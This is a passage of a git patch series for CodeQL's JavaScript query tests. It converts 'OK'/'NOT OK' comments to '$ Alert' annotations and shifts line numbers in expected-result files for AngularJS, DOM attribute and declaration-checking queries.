a/javascript/ql/test/query-tests/Vue/tst.js +++ b/javascript/ql/test/query-tests/Vue/tst.js @@ -1,16 +1,16 @@ let Vue = require('vue'); new Vue( { - created: () => this, // NOT OK + created: () => this, // $ Alert computed: { - x: () => this, // NOT OK - y: { get: () => this }, // NOT OK - z: { set: () => this } // NOT OK + x: () => this, // $ Alert + y: { get: () => this }, // $ Alert + z: { set: () => this } // $ Alert }, methods: { - arrow: () => this, // NOT OK - nonArrow: function() { this; }, // OK - arrowWithoutThis: () => 42, // OK - arrowWithNestedThis: () => (() => this) // OK + arrow: () => this, // $ Alert + nonArrow: function() { this; }, + arrowWithoutThis: () => 42, + arrowWithNestedThis: () => (() => this) } }); diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js index e6c6509eca6e..652853b992e9 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js @@ -31,7 +31,7 @@ var g2 = function() { return arguments[0] * arguments[1]; } -// OK: only five statements +// OK - only five statements function h() { if (arguments.length == 0) return 23; From 426edd55f2dd3a5fbec9eeb09ea17fe869de12ce Mon Sep 17 00:00:00 2001 From: Asger F Date: Thu, 6 Feb 2025 14:33:21 +0100 Subject: [PATCH 047/892] JS: Update output after line number change Some OK-style comments had to be moved to the following line, shifting line numbers. In selected range also included the comments themselves. Lastly, the result sets were reordered by the CLI in some cases. --- .../RepeatedInjection.expected | 4 +- .../UnusedAngularDependency.expected | 2 +- .../AngularJS/UseNgSrc/UseNgSrc.expected | 10 +- .../DOM/HTML/AmbiguousIdAttribute.expected | 2 +- .../DOM/HTML/ConflictingAttributes.expected | 4 +- .../DOM/HTML/DuplicateAttributes.expected | 4 +- .../DOM/HTML/MalformedIdAttribute.expected | 4 +- .../DOM/TargetBlank/TargetBlank.expected | 10 +- .../AssignmentToConst.expected | 14 +- .../ClobberingVarInit.expected | 2 +- .../DeadStoreOfGlobal.expected | 2 +- .../DeadStoreOfLocal.expected | 24 +- .../DuplicateVarDecl.expected | 2 +- .../MissingThisQualifier.expected | 12 +- .../MissingVarDecl/MissingVarDecl.expected | 14 +- .../MixedStaticInstanceThisAccess.expected | 6 +- .../TemporalDeadZone.expected | 2 +- .../UnusedParameter/UnusedParameter.expected | 6 +- .../UnusedVariable/UnusedVariable.expected | 2 +- .../EnablingNodeIntegration.expected | 2 +- .../BitwiseSignCheck.expected | 4 +- .../CompareIdenticalValues.expected | 2 +- .../ExprHasNoEffect/ExprHasNoEffect.expected | 16 +- .../HeterogeneousComparison.expected | 100 +- .../ImplicitOperandConversion.expected | 34 +- .../MisspelledIdentifier.expected | 12 +- .../SelfAssignment/SelfAssignment.expected | 6 +- .../SuspiciousInvocation.expected | 2 +- .../WhitespaceContradictsPrecedence.expected | 2 +- .../UndocumentedParameter.expected | 4 +- .../BadTypeof/BadTypeof.expected | 6 +- .../ExpressionClosures.expected | 2 +- .../LengthComparisonOffByOne.expected | 14 +- .../NonLinearPattern.expected | 22 +- .../PropertyWriteOnPrimitive.expected | 6 +- .../SetterIgnoresParameter.expected | 4 +- .../SetterReturn/SetterReturn.expected | 2 +- .../SpuriousArguments.expected | 28 +- .../StrictModeCallStackIntrospection.expected | 14 +- .../YieldInNonGenerator.expected | 2 +- .../NonLocalForIn/NonLocalForIn.expected | 10 +- .../ReassignParameterAndUseArguments.expected | 2 +- .../BackrefIntoNegativeLookahead.expected | 2 +- .../UnboundBackref/UnboundBackref.expected | 8 +- .../UnmatchableCaret.expected | 6 +- .../UnmatchableDollar.expected | 8 +- .../CWE-022/TaintedPath/TaintedPath.expected | 744 +++++------ .../UselessUseOfCat/UselessUseOfCat.expected | 2 +- .../Security/CWE-079/DomBasedXss/Xss.expected | 1122 ++++++++--------- .../XssWithAdditionalSources.expected | 934 +++++++------- .../ReflectedXss/ReflectedXss.expected | 232 ++-- .../ReflectedXssWithCustomSanitizer.expected | 44 +- .../UnsafeJQueryPlugin.expected | 22 +- .../CWE-089/untyped/DatabaseAccesses.expected | 82 +- .../CWE-089/untyped/SqlInjection.expected | 788 ++++++------ .../CodeInjection/CodeInjection.expected | 154 +-- .../HeuristicSourceCodeInjection.expected | 112 +- .../CWE-1004/ClientExposedCookie.expected | 16 +- ...ompleteMultiCharacterSanitization.expected | 42 +- .../CWE-1275/SameSiteNoneCookie.expected | 8 +- .../CWE-200/FileAccessToHttp.expected | 18 +- .../CWE-312/BuildArtifactLeak.expected | 6 +- .../CWE-312/CleartextStorage.expected | 6 +- .../Security/CWE-367/FileSystemRace.expected | 2 +- .../ReDoS/PolynomialBackTracking.expected | 42 +- .../CWE-400/ReDoS/PolynomialReDoS.expected | 6 +- .../Security/CWE-400/ReDoS/ReDoS.expected | 34 +- .../ClientSideUrlRedirect.expected | 186 +-- .../ServerSideUrlRedirect.expected | 198 +-- .../query-tests/Security/CWE-611/Xxe.expected | 38 +- .../Security/CWE-614/ClearTextCookie.expected | 26 +- .../Security/CWE-643/XpathInjection.expected | 10 +- .../Security/CWE-730/RegExpInjection.expected | 222 ++-- .../Security/CWE-730/ServerCrash.expected | 66 +- .../Security/CWE-776/XmlBomb.expected | 38 +- .../CWE-807/ConditionalBypass.expected | 2 +- .../FunctionalityFromUntrustedSource.expected | 10 +- ...onfusionThroughParameterTampering.expected | 8 +- .../PrototypePollutingMergeCall.expected | 12 +- .../EphemeralLoop/EphemeralLoop.expected | 4 +- .../ImplicitReturn/ImplicitReturn.expected | 6 +- .../InconsistentLoopOrientation.expected | 6 +- .../NestedLoopsSameVariable.expected | 2 +- .../ReturnAssignsLocal.expected | 4 +- .../ReturnOutsideFunction.expected | 2 +- ...iciousUnusedLoopIterationVariable.expected | 8 +- 86 files changed, 2855 insertions(+), 2855 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected @@ -2,5 +2,5 @@ | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected index d5b4c267c39e..2ca924302a23 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected @@ -2,4 +2,4 @@ | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. | | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. | | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. | -| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | +| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected index 5b5f5ffa00c0..bd93c005dec1 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected @@ -1,5 +1,5 @@ -| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | -| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | -| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | +| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | +| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected index c013ea098297..3f5ebd72f8ec 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected @@ -1,3 +1,3 @@ | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element | | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element | -| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element | +| tst.js:17:22:17:33 | id="theDiff" | This element has the same id as $@. | tst.js:17:46:17:57 | id="theDiff" | another element | diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected index 46ff575e355c..4b9243036e4f 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected @@ -1,3 +1,3 @@ | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute | -| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute | -| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute | +| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute | +| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute | diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected index 988c4925a461..aa0a43e5d1be 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected @@ -1,3 +1,3 @@ | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later | -| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later | -| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later | +| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later | +| tst.js:19:17:19:28 | id="theDiff" | This attribute $@. | tst.js:19:30:19:41 | id="theDiff" | is duplicated later | diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected index 96d365e5dc5e..fbbfcc95d23b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected @@ -1,5 +1,5 @@ | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. | -| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. | -| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. | +| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. | +| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. | diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected index 1fba6292f897..531f431b86f9 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected @@ -2,8 +2,8 @@ | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | -| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. | +| tst.js:17:1:17:43 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:18:1:18:58 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:19:1:19:51 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:31:12:31:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | +| tst.js:39:12:39:20 | $("") | External links without noopener/noreferrer are a potential security risk. | diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected index b74841153cb3..7e457d64b08e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected @@ -1,7 +1,7 @@ -| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | -| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | -| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared | +| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | +| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | +| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared | diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected @@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected @@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected @@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected index 1e5f4d643241..a5b1e0c00dfc 100644 --- a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected +++ b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected @@ -1,3 +1,3 @@ -| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... K\\n } | bar | -| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... K\\n } | bar | -| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... K\\n } | test | +| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... t\\n } | bar | +| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... t\\n } | bar | +| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... t\\n } | test | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ 